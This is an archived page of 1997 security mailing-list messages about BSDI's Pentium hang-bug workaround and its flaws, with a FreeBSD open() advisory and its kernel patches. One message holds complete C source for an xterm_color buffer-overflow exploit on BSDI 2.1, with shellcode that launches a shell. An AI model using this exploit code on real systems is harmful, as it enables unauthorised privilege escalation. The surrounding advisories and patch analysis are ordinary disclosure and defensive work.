OpenNET security: Intel Pentium Bug: BSDI Releases a patch

Intel Pentium Bug: BSDI Releases a patch


<< Previous	INDEX	Search	src	Set bookmark	Go to bookmark	Next >>
BSDBSDReturn-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
From: Dag-Erling Coidan =?UNKNOWN-8BIT?Q?Sm=F8rgrav?= <dag-erli@IFI.UIO.NO.>
Subject:      Re: Intel Pentium Bug: BSDI Releases a patch
To: [email protected]
In-Reply-To:  Joe Ilacqua's message of Tue, 11 Nov 1997 17:36:59 -0700
Status:   
X-PMFLAGS: 33554560 0

Joe Ilacqua <spike@INDRA.COM.> writes:
> Apparently the issue can be addressed in software.  No details on how
> it works are provided.
>
> From: Jeff Polk <polk@bsdi.com.>
> [...]
> With information provided by Intel, BSDI has developed a workaround
> for this problem.  A beta version of the mod for BSD/OS version 3.1
> is now available for testing from
>
>         ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/M310-hangfix
>

There's nothing there but a message saying the patch is unavailable.
Back to square one.

--
 * Finrod (INTJ) * Unix weenie * [email protected] * cellular +47-92835919 *
  RFC1123: "Be liberal in what you accept, and conservative in what you send"
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 9851 invoked from network); 12 Nov 1997 10:01:58 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 12 Nov 1997 10:01:58 -0000
Received: by scylla.sovam.com id AA25671
  (5.67b8s3p1/IDA-1.5 for [email protected]); Wed, 12 Nov 1997 10:10:46 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA24039
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Wed, 12 Nov 1997 10:01:33 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id LAA19195
        for <mc@CONJURER.TYUMEN.RU.>; Wed, 12 Nov 1997 11:59:59 +0500 (ES)
Received: from [email protected] (port 58972 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <96977-10840>; Tue, 11 Nov 1997 22:37:27 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5567391 for [email protected]; Tue, 11 Nov 1997 22:36:21
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          WAA27290 for <BUGTRAQ@NETSPACE.ORG.>; Tue, 11 Nov 1997 22:36:13 -0500
Received: from [email protected] (port 58972 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <80758-10840>; Tue, 11 Nov 1997
          22:35:12 -0500
Approved-By: [email protected]
Received: from server.indra.com (server.indra.com [204.144.142.2]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id TAA06231 for
          <BUGTRAQ@netspace.org.>; Tue, 11 Nov 1997 19:37:13 -0500
Received: from indra.com (net.indra.com [204.144.142.1]) by server.indra.com
          (8.8.5/) with ESMTP id RAA04511 for <BUGTRAQ@netspace.org.>; Tue, 11
          Nov 1997 17:37:07 -0700 (MST)
Received: from coke ([email protected] [204.144.142.10]) by indra.com
          (8.8.5/Spike-8-1.0) with ESMTP id RAA11834 for
          <BUGTRAQ@netspace.org.>; Tue, 11 Nov 1997 17:37:06 -0700 (MST)
Received: from indra.com by coke (8.8.5/Spike-8.0) id RAA00861; Tue, 11 Nov
          1997 17:37:05 -0700 (MST)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Message-Id: <199711120037.RAA00861@coke.>
Date: 	Tue, 11 Nov 1997 17:36:59 -0700
Reply-To: Joe Ilacqua <spike@INDRA.COM.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: Joe Ilacqua <spike@INDRA.COM.>
Subject:      Intel Pentium Bug: BSDI Releases a patch
To: [email protected]
Status:   
X-PMFLAGS: 34078848 0

Apparently the issue can be addressed in software.  No details on how
it works are provided.

------- Forwarded Message

To: [email protected]
Subject: Beta test of Pentium hang work-around for BSD/OS 3.1 (and 3.0)
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 11 Nov 1997 16:38:48 -0700
From: Jeff Polk <polk@bsdi.com.>
Sender: [email protected]
Precedence: bulk
X-Sender: Jeff Polk <polk@bsdi.com.>
X-UIDL: fb8659ed152bd2ba9912c603b6a1b837

As many of you probably know, a bug was recently discovered in the
Pentium CPU that causes the CPU to hang when a certain instruction
is executed.  This bug has been widely reported in mailing lists
and news groups.  The bug enables an unprivileged user to hang the
system, requiring the system to be reset or power-cycled.

With information provided by Intel, BSDI has developed a workaround
for this problem.  A beta version of the mod for BSD/OS version 3.1
is now available for testing from

        ftp://ftp.bsdi.com/bsdi/patches/patches-3.1/M310-hangfix


This mod may also be applied to 3.0 based systems.

The workaround is enabled only on P5 processors, and should not
be necessary on Pentium Pro, Pentium II or non-Intel CPUs.

The mod is currently available only in binary form.  We anticipate
general release of the mod within a day or so.  We are interested
in hearing of any problems experienced with this change.  We are
also interested in hearing about testing on any non-Intel
Pentium-compatible systems.  Please send any reports to

        [email protected]


We are not at liberty to discuss the mechanism of the workaround
at this time.

If you are installing the mod in a source kernel tree, you will
need to copy the files sys/i386/OBJ/{machdep.o,locore.o} to
your kernel compile directory before rebuilding your kernel.

Jeff
- --
     /\   Jeff Polk            Berkeley Software Design, Inc. (BSDI)
  /\/  \  [email protected]        5575 Tech Center Dr. #110, Colo Spgs, CO 80919


- --
To unsubscribe from this list, send 'unsubscribe' in the body of an e-mail
message to '[email protected]'



------- End of Forwarded Message
Return-Path: <best-of-security-request@cyber.com.au.>
Delivered-To: [email protected]
Received: (qmail 2001 invoked from network); 15 Nov 1997 01:01:34 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 15 Nov 1997 01:01:34 -0000
Received: by scylla.sovam.com id AA17397
  (5.67b8s3p1/IDA-1.5 for [email protected]); Fri, 14 Nov 1997 23:36:59 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA17296
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Fri, 14 Nov 1997 23:33:32 +0300
Received: from plum.cyber.com.au (plum.cyber.com.au [203.7.155.24])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id BAA07119
        for <mc@conjurer.tyumen.ru.>; Sat, 15 Nov 1997 01:32:56 +0500 (ES)
Received: (from slist@localhost)
        by plum.cyber.com.au (8.8.6/8.8.6) id GAA07342;
        Sat, 15 Nov 1997 06:59:06 +1100 (EST)
Resent-Date: Sat, 15 Nov 1997 06:59:06 +1100 (EST)
Delivered-To: [email protected]
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Message-Id: <3.0.3.32.19971104173054.009bda70@neosoft.com.>
Date: 	Tue, 4 Nov 1997 17:30:54 -0600
Reply-To: Tony Hagale <bagel@NEOSOFT.COM.>
Sender: [email protected]
From: Tony Hagale <bagel@NEOSOFT.COM.>
Old-X-Originally-To: To: [email protected]
Old-X-Originated-From: From: Tony Hagale <bagel@NEOSOFT.COM.>
Resent-Message-Id: <"JUoWCC.A.xSD.xYAb0"@plum>
X-Loop: [email protected]
Errors-To: [email protected]
Precedence: list
Resent-Sender: [email protected]
To: [email protected]
Resent-From: [email protected]
X-Mailing-List: <best-of-security@cyber.com.au.> ftp://ftp.cyber.com.au/pub/archive/b-o-s/
X-Subscription: To unsubscribe from this fine mailing list mail [email protected] with Subject: unsubscribe
Subject: BoS:      FreeBSD Security Advisory: FreeBSD-SA-97:05.open
Status:   
X-PMFLAGS: 34078848 0


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

>From: FreeBSD Security Officer <security-officer@FreeBSD.ORG.>
>To: [email protected]
>Subject: FreeBSD Security Advisory: FreeBSD-SA-97:05.open
>Date: Wed, 29 Oct 1997 20:01:00 +0100 (MET)
>Reply-To: [email protected]
>Sender: [email protected]
>X-Loop: FreeBSD.org
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>
>=====================================================================
========
>FreeBSD-SA-97:05                                            Security
Advisory
>
FreeBSD, Inc.
>
>Topic:          security compromise via open()
>
>Category:       core
>Module:         kern
>Announced:      1997-10-29
>Affects:        FreeBSD 2.1.*, FreeBSD 2.2.*,
>               FreeBSD-stable and FreeBSD-current
>Corrected:      FreeBSD-current as of 1997/10/23 (partly even on
1997/04/14)
>               FreeBSD-stable as of 1997/10/24
>               FreeBSD 2.1-stable as of 1997/10/29
>FreeBSD only:   yes
>
>Patches:        ftp://freebsd.org/pub/CERT/patches/SA-97:05/
>
>=====================================================================
========
>
>I.   Background
>
>     In FreeBSD, the open() system call is used in normal file
operations.
>     When calling open(), the caller should specify if the file is
>     to be opened for reading, for writing or for both.
>     The right to reading from and/or writing to a file is
controlled
>     by the file's mode bits in the filesystem.
>     In FreeBSD, open() is also used to obtain the right to do
>     privileged io instructions.
>
>
>II.  Problem Description
>
>     A problem exists in the open() syscall that allows processes
>     to obtain a valid file descriptor without having read or write
>     permissions on the file being opened. This is normally not a
>     problem. The FreeBSD way of obtaining the right to do io
>     instructions however, is based on the right to open a specific
>     file (/dev/io).
>
>III. Impact
>
>     The problem can be used by any user on the system to do
unauthorised
>     io instructions.
>
>
>IV.  Workaround
>
>     No workaround is available.
>
>V.   Solution
>
>     Apply the following patches. The first one in
/usr/src/sys/kern,
>     and the second one in /usr/src/sys/i386/i386,
>     Rebuild your kernel, install it and reboot your system.
>
>     patch 1:
>     For FreeBSD-current before 1997/10/23:
>
>     Index: vfs_syscalls.c
>

>     RCS file: /home/cvsup/freebsd/CVS/src/sys/kern/vfs_syscalls.c,v
>     retrieving revision 1.76
>     retrieving revision 1.77
>     diff -u -r1.76 -r1.77
>     --- vfs_syscalls.c        1997/10/12 20:24:27     1.76
>     +++ vfs_syscalls.c        1997/10/22 07:28:51     1.77
>     @@ -863,11 +863,13 @@
>       struct flock lf;
>       struct nameidata nd;
>
>     + flags = FFLAGS(SCARG(uap, flags));
>     + if ((flags & FREAD + FWRITE) == 0)
>     +         return (EINVAL);
>       error = falloc(p, &nfp, &indx);
>       if (error)
>               return (error);
>       fp = nfp;
>     - flags = FFLAGS(SCARG(uap, flags));
>       cmode = ((SCARG(uap, mode) &~ fdp->fd_cmask) & ALLPERMS) &~
S_ISTXT;
>       NDINIT(&nd, LOOKUP, FOLLOW, UIO_USERSPACE, SCARG(uap, path),
p);
>       p->p_dupfd = -indx - 1;                 /* XXX check for fdopen */
>
>
>     For FreeBSD 2.1.* and 2.2.*:
>
>     Index: vfs_syscalls.c
>

>     RCS file: /home/cvsup/freebsd/CVS/src/sys/kern/vfs_syscalls.c,v
>     retrieving revision 1.51.2.5
>     diff -u -r1.51.2.5 vfs_syscalls.c
>     --- vfs_syscalls.c        1997/10/01 06:23:48     1.51.2.5
>     +++ vfs_syscalls.c        1997/10/28 22:04:43
>     @@ -688,11 +688,13 @@
>       struct flock lf;
>       struct nameidata nd;
>
>     + flags = FFLAGS(uap->flags);
>     + if ((flags & FREAD + FWRITE) == 0)
>     +         return (EINVAL);
>       error = falloc(p, &nfp, &indx);
>       if (error)
>               return (error);
>       fp = nfp;
>     - flags = FFLAGS(uap->flags);
>       cmode = ((uap->mode &~ fdp->fd_cmask) & ALLPERMS) &~ S_ISTXT;
>       NDINIT(&nd, LOOKUP, FOLLOW, UIO_USERSPACE, uap->path, p);
>       p->p_dupfd = -indx - 1;                 /* XXX check for fdopen */
>
>     patch 2:
>     For FreeBSD 2.1.* and 2.2.* and For FreeBSD-current before
1997/04/14:
>
>     Index: mem.c
>

>     RCS file: /home/cvsup/freebsd/CVS/src/sys/i386/i386/mem.c,v
>     retrieving revision 1.38
>     retrieving revision 1.38.2.1
>     diff -u -r1.38 -r1.38.2.1
>     --- mem.c 1996/09/27 13:25:06     1.38
>     +++ mem.c 1997/10/23 22:14:24     1.38.2.1
>     @@ -169,6 +169,7 @@
>       int fmt;
>       struct proc *p;
>      {
>     + int error;
>       struct trapframe *fp;
>
>       switch (minor(dev)) {
>     @@ -179,6 +180,11 @@
>               return ENODEV;
>      #endif
>       case 14:
>     +         error = suser(p->p_ucred, &p->p_acflag);
>     +         if (error != 0)
>     +                 return (error);
>     +         if (securelevel > 0)
>     +                 return (EPERM);
>               fp = (struct trapframe *)curproc->p_md.md_regs;
>               fp->tf_eflags |= PSL_IOPL;
>               break;
>
>=====================================================================
========
>FreeBSD, Inc.
>
>Web Site:                       http://www.freebsd.org/
>Confidential contacts:          [email protected]
>PGP Key:
ftp://freebsd.org/pub/CERT/public_key.asc
>Security notifications:         [email protected]
>Security public discussion:     [email protected]
>
>Notice: Any patches in this document may not apply cleanly due to
>        modifications caused by digital signature or mailer
software.
>        Please reference the URL listed at the top of this document
>        for original copies of all patches if necessary.
>=====================================================================
========
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBNFeHI1UuHi5z0oilAQEtvAQAgMrMQvRpBOiV1nWzPzDSsnQOz4bBppcT
>SMEssoeRrr0cQQACZ4su3vlb71XJzgXi3bakEvvZgsMSSKb3sNxEl0RHR93cDNlE
>L9x3sDjbY7l1q2W4BldTly7W4WDjnJt5KEVbi7DKhXb+SuxgaSN0lsow5Cgd54jX
>skpX4qluhBM=
>=47P3
>-----END PGP SIGNATURE-----
>
>
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNF+wLfE0YW+shGjqEQLMTgCg35IBdHPA8L8fYmdGGk3+MAk6hcsAoMvN
OUfcNBJTrbYZy+tv0De4bnCz
=gYka
-----END PGP SIGNATURE-----




----------------------------------------------------------------------------

.,_-================-_,.
   [email protected]
[email protected]
.,_-================-_,.

Tony Hagale
+---------------------------------------------------+
|-BAGEL.NEOSOFT.COM,BAGEL.NET sysadmin..............|
|-WWW Designer......http://www.neosoft.com/~bagel...|
|-bagel on #sj on EFNet.............................|
|-Guru-for-hire UNIX/WIN/c/c++/vb/pascal............|
|-Strake Jesuit College Prep CCX Debator/CX Pres....|
|-ICQ ID# 3568586...................................|
|-U.S. Air Force Auxillary Member...................|
|-PGP Key ID 0xAC8468EA.............................|
+---------------------------------------------------+


Return-Path: <best-of-security-request@cyber.com.au.>
Delivered-To: [email protected]
Received: (qmail 8702 invoked from network); 15 Nov 1997 07:46:34 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 15 Nov 1997 07:46:34 -0000
Received: by scylla.sovam.com id AA13169
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sat, 15 Nov 1997 10:41:03 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA13127
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Sat, 15 Nov 1997 10:36:57 +0300
Received: from plum.cyber.com.au (plum.cyber.com.au [203.7.155.24])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id MAA23099
        for <mc@conjurer.tyumen.ru.>; Sat, 15 Nov 1997 12:35:04 +0500 (ES)
Received: (from slist@localhost)
        by plum.cyber.com.au (8.8.6/8.8.6) id SAA05005;
        Sat, 15 Nov 1997 18:15:05 +1100 (EST)
Resent-Date: Sat, 15 Nov 1997 18:15:05 +1100 (EST)
Delivered-To: [email protected]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <199710230632.IAA27552@saguaro.eunet.cz.>
Date: 	Thu, 23 Oct 1997 08:32:10 +0200
Reply-To: Ladislav Bukvicka <Ladislav.Bukvicka@EUNET.CZ.>
Sender: [email protected]
From: Ladislav Bukvicka <Ladislav.Bukvicka@EUNET.CZ.>
Old-X-Originally-To: To: [email protected]
Old-X-Originated-From: From: Ladislav Bukvicka <Ladislav.Bukvicka@EUNET.CZ.>
Resent-Message-Id: <"gfqsv.A.32E.nNQb0"@plum>
X-Loop: [email protected]
Errors-To: [email protected]
Precedence: list
Resent-Sender: [email protected]
To: [email protected]
Resent-From: [email protected]
X-Mailing-List: <best-of-security@cyber.com.au.> ftp://ftp.cyber.com.au/pub/archive/b-o-s/
X-Subscription: To unsubscribe from this fine mailing list mail [email protected] with Subject: unsubscribe
Subject: BoS:      BSDI xterm_color/kterm exploit
Status:   
X-PMFLAGS: 34078848 0


-----BEGIN PGP SIGNED MESSAGE-----

Hi,
try this exploit, it works on BSDI 2.1 and I think that it works
in older versions too.
The patch from BSDI which fixes security problems with X11 library
on BSDI 2.1 has number U210-041.

This exploit is based on exploit of bug in Linux - color_xterm
which was here some time ago.

bye
pukvis

PS: exploit of kterm is the same, but you must rewrite paths.

- --- here is xterm_color expoit ---



/*

   xterm_color buffer overflow exploit for BsDi ... tested on BsDi 2.1

                                                        pukvis


*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define XTERM_COLOR_PATH "/usr/X11R6/bin/xterm_color"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
  "\xeb\x23"
   "\x5e"
   "\x8d\x1e"
   "\x89\x5e\x0b"
   "\x31\xd2"
   "\x89\x56\x07"
   "\x89\x56\x0f"
   "\x89\x56\x14"
   "\x88\x56\x19"
   "\x31\xc0"
   "\xb0\x3b"
   "\x8d\x4e\x0b"
   "\x89\xca"
   "\x52"
   "\x51"
   "\x53"
   "\x50"
   "\xeb\x18"
   "\xe8\xd8\xff\xff\xff"
   "/bin/sh"
   "\x01\x01\x01\x01"
   "\x02\x02\x02\x02"
  "\x03\x03\x03\x03"
  "\x9a\x04\x04\x04\x04\x07\x04";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   int i,OffSet = DEFAULT_OFFSET;

   if (argc>1) OffSet = atoi(argv[1]);

   buff = malloc(2048);
   if(!buff)
   {
      printf("mA1o pJaMJeti !!!\n");
      exit(0);
   }
   ptr = buff;

   for (i = 0; i <= BUFFER_SIZE - strlen(shellcode) - NOP_SIZE;
i+=NOP_SIZE) {
        memcpy (ptr,nop,NOP_SIZE);
        ptr+=NOP_SIZE;
   }

   for(i=0;i < strlen(shellcode);i++)
      *(ptr++) = shellcode[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_sp() + OffSet;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   (void) fprintf(stderr,
         "try if it goes - check your id\n");
    execl(XTERM_COLOR_PATH, "xterm_color", "-xrm",buff, NULL);
}

- --- end of xterm_color exploit ---


- --
====== ____                            = Ladislav Bukvicka ======
===== /      /   /   ___    ___  _/_  == Pod Sancemi  441/1 =====
==== /----  /   /  /   /  /___/  /   === Prague 9,Czech Rep. ====
=== /____  /___/  /   /  /___   /   ==== fax:+420(2) 66313404 ===
==                                 ===== tel.:+420(2) 66008161 ==
=  Connecting Europe since 1982   ====== e-mail:[email protected] =



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: ascii

iQCVAwUBNE7vZyWGrQpNBKPlAQH1BgP+MNHCxUJJ3/9tR/mgZhCbrBM1yhmWp1FV
U25Wt9tzWeQofpy+7kQB9tKQw9hrSroe9EtVxCj6UHFMN5Z3qLPEw/5QA1TkIW07
jpe4+kZTQkU2MemCshw1jAbKLsrfv8qc4OvY+tE7ZKpnq95KQ4BMsWiqCLAAwKb/
R0ghchb82Ew=
=vsfP
-----END PGP SIGNATURE-----


Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 23272 invoked from network); 16 Nov 1997 01:01:36 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 16 Nov 1997 01:01:36 -0000
Received: by scylla.sovam.com id AA26013
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sun, 16 Nov 1997 00:23:20 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA25990
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Sun, 16 Nov 1997 00:22:01 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id CAA08731
        for <mc@CONJURER.TYUMEN.RU.>; Sun, 16 Nov 1997 02:21:41 +0500 (ES)
Received: from [email protected] (port 23568 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <97002-27738>; Sat, 15 Nov 1997 15:15:06 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5661416 for [email protected]; Sat, 15 Nov 1997 15:09:06
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          OAA29281 for <BUGTRAQ@NETSPACE.ORG.>; Sat, 15 Nov 1997 14:58:07 -0500
Received: from [email protected] (port 23568 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <80685-27737>; Sat, 15 Nov 1997
          14:58:05 -0500
Approved-By: [email protected]
Received: from bikini.ai.mit.edu (bikini.ai.mit.edu [128.52.32.254]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id XAA21195 for
          <BUGTRAQ@NETSPACE.ORG.>; Fri, 14 Nov 1997 23:12:19 -0500
Received: (from mycroft@localhost) by bikini.ai.mit.edu (8.8.7/8.8.6) id
          XAA24285; Fri, 14 Nov 1997 23:15:44 -0500 (EST)
References: <199711120037.RAA00861@coke.> <el2oh3nvc0i.fsf@bikini.ai.mit.edu.>
            <el2k9ebv5ia.fsf@bikini.ai.mit.edu.>
Lines: 69
X-Mailer: Gnus v5.3/Emacs 19.34
Message-Id: <el2200ivllb.fsf@bikini.ai.mit.edu.>
Date: 	Fri, 14 Nov 1997 23:15:44 -0500
Reply-To: "Charles M. Hannum" <mycroft@MIT.EDU.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: "Charles M. Hannum" <mycroft@MIT.EDU.>
Subject:      Re: Pentium bug workaround in NetBSD (was Re: Intel Pentium Bug:
              BSDI Releases a patch)
X-Cc:         [email protected]
To: [email protected]
In-Reply-To:  [email protected]'s message of 14 Nov 1997 10:50:53 -0500
Status:   
X-PMFLAGS: 33554560 0

One last addendum, and then I'm going to bang my head against a wall
or something.


[email protected] (Charles M. Hannum) writes:

>
> Using the RF flag, though, we could also fix the BSDI hack to not have
> the original caveats.  If RF is set, we know that a particular
> instruction caused the fault, and we can always decode it to decide
> what to do:

Actually, that isn't quite true.  RF is always set when we get the
page fault.  It turns out there's no way to distinguish a real trace
trap from an INT 1 or ICEBP/INT01, and that full decoding of the BOUND
instruction is not necessary because the saved PC points to the BOUND
instruction itself.  Incorporating only these two changes, the
processing rules I suggested would be more correctly stated as:

* If the page fault was outside the IDT, or was due to user mode
access to the IDT (i.e. the U bit is set in the error code), process
it as a normal page fault.


* If the page fault was for vector 1, turn off the RF flag, and enter
the trace trap handler.


* If the page fault occured at an INT instruction:


  * If we're in VM86 mode, enter the protection fault handler.  (This
  should never happen, since we should have gotten a protection fault
  from the hardware.)


  * If the page fault was for vectors 3, 4 or 5, or came from kernel
  space, advance the PC (always 2 bytes + prefixes) past the
  instruction, turn off the RF flag, and enter the handler for that
  exception.


  * If the page fault was for vectors 0, 2 or 6, and came from user
  space, enter the protection fault handler.


* If the page fault occured at a different instruction:


  * If the page fault was for vectors 3 or 4, advance the PC (always 1
  byte + prefixes) past the instruction, turn off the RF flag, and
  enter the handler for that exception.


  * If the page fault was for vectors 0, 2, 5 or 6, enter the handler
  for that exception.


This leaves two semantic differences when the workaround is active,
neither of which is serious:

* INT 1 and ICEBP/INT01 will cause a trace fault (*not* a trace trap)
rather than a protection fault.


* In a SMP system, it's possible that the instruction could be
modified while it's being inspected by the page fault handler.  In
this event, the code may do the wrong fixup, causing the wrong type of
exception to be delivered.


Note that the code that scans the instruction prefixes and looks for
the first byte of the instruction needs to be careful to check for the
end of the segment and limit how far it searches; otherwise it might
be possible for another processor in a SMP system to modify the
instruction sequence in such a way that the processor that took the
original page fault gets stuck in a loop or runs off the end of a
segment.
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 4356 invoked from network); 15 Nov 1997 03:16:35 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 15 Nov 1997 03:16:35 -0000
Received: by scylla.sovam.com id AA29381
  (5.67b8s3p1/IDA-1.5 for [email protected]); Sat, 15 Nov 1997 04:50:14 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA29379
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Sat, 15 Nov 1997 04:49:41 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id GAA21077
        for <mc@CONJURER.TYUMEN.RU.>; Sat, 15 Nov 1997 06:49:06 +0500 (ES)
Received: from [email protected] (port 32080 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <81249-23018>; Fri, 14 Nov 1997 20:17:08 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5655137 for [email protected]; Fri, 14 Nov 1997 20:16:23
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          UAA00022 for <BUGTRAQ@NETSPACE.ORG.>; Fri, 14 Nov 1997 20:15:39 -0500
Received: from [email protected] (port 32080 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <80708-23015>; Fri, 14 Nov 1997
          20:15:33 -0500
Approved-By: [email protected]
Received: from bikini.ai.mit.edu (bikini.ai.mit.edu [128.52.32.254]) by
          netspace.org (8.8.7/8.8.2) with ESMTP id TAA27373 for
          <BUGTRAQ@NETSPACE.ORG.>; Fri, 14 Nov 1997 19:29:36 -0500
Received: (from mycroft@localhost) by bikini.ai.mit.edu (8.8.7/8.8.6) id
          TAA24135; Fri, 14 Nov 1997 19:33:00 -0500 (EST)
Message-Id: <199711150033.TAA24135@bikini.ai.mit.edu.>
Date: 	Fri, 14 Nov 1997 19:33:00 -0500
Reply-To: "Charles M. Hannum" <mycroft@MIT.EDU.>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG.>
From: "Charles M. Hannum" <mycroft@MIT.EDU.>
Subject:      BSDI patch for Pentium workaround has problems
X-Cc:         [email protected]
To: [email protected]
Status:   
X-PMFLAGS: 33554560 0

[I sent the body of this to people at BSDI and Intel after looking at
the official release version of the BSDI patch.]

In addition to the concerns I posted on bugtraq regarding handling of
INTO and BOUND instructions, and the (albeit minor) differences in
handling INT $0, INT $1, INT $2, and INT $6 from user code, the new
revision of the BSDI patch fails in two additional ways:

It directly accesses a linear address in user space using the kernel
segment descriptors, ignoring that the process may be in VM86 mode or
16-bit protected mode.  (You might be able to ignore protected mode if
you don't allow the user to create segment descriptors.  We do to
support WINE and WABI.)  Not only will it therefore get the PC (%eip)
fixup wrong in these modes, but it may also cause an unhandled page
fault in kernel space, which will cause the kernel to crash.  This is
highly suboptimal.

If you're going to look at the user instruction (which you *need* to
do to properly handle BOUND), then you must do the segment
translations correctly.  Note that there's a race condition here in
SMP systems, but in practice this is minor; if the user changes the
instruction while we're doing the fixup, the fixup will do something
not quite right, but should not create a security hole.


I include below three pieces of mail from me about this on bugtraq.
(Note that my suggested way of reexecuting the instruction actually
can't work correctly in a SMP system, but I include it here for
completeness.  Basically, the user could change the instruction before
it's reexecuted to be something that doesn't trap, then do a bunch of
things to cause the cache to be completely flushed, and do the hanging
instruction again while we're still pointing to the fully mapped IDT,
causing the hang.  We could try to work around this using the trace
flag to force an exception, but in protected mode the user can change
the trace flag.)

[Other messages omitted, since I already sent them here.]
Return-Path: <owner-bugtraq@NETSPACE.ORG.>
Delivered-To: [email protected]
Received: (qmail 29555 invoked from network); 14 Nov 1997 18:46:35 -0000
Received: from scylla.sovam.com (194.67.2.97)
  by sky.tyumen.dial.sovam.com with SMTP; 14 Nov 1997 18:46:35 -0000
Received: by scylla.sovam.com id AA07133
  (5.67b8s3p1/IDA-1.5 for [email protected]); Fri, 14 Nov 1997 20:52:37 +0300
Received: from conjurer.tyumen.ru by scylla.sovam.com with SMTP id AA06899
  (5.67b8s3p1/IDA-1.5 for <admin@skyway.ru.>); Fri, 14 Nov 1997 20:48:28 +0300
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143])
        by conjurer.tyumen.ru (8.8.5/8.8.5) with ESMTP id WAA06188
        for <mc@CONJURER.TYUMEN.RU.>; Fri, 14 Nov 1997 22:47:47 +0500 (ES)
Received: from [email protected] (port 21775 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <97810-21248>; Fri, 14 Nov 1997 11:10:41 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 5646995 for [email protected]; Fri, 14 Nov 1997 11:09:37
          -0500
Received: from brimstone.netspace.org (brimstone.netspace.org
          [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id
          KAA13941 for <BUGTRAQ@NETSPACE.ORG.>; Fri, 14 Nov 1997 10:59:10 -0500
Received: from [email protected] (port 21775 [128.148.157.6]) by
          brimstone.netspace.org with ESMTP id <81127-21250>; Fri, 14 Nov 1997
          10:59:04 -0500
Approved-By: [email protected]
